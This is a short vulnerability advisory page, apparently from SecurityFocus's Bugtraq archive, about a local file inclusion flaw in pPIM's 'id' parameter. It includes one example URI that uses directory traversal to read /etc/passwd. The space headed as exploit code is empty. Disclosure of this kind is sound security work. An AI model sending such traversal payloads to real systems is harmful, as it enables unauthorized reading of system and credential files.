Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

pPIM 'id' Parameter Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd

The following exploit code is available:







 

Privacy Statement
Copyright 2008, SecurityFocus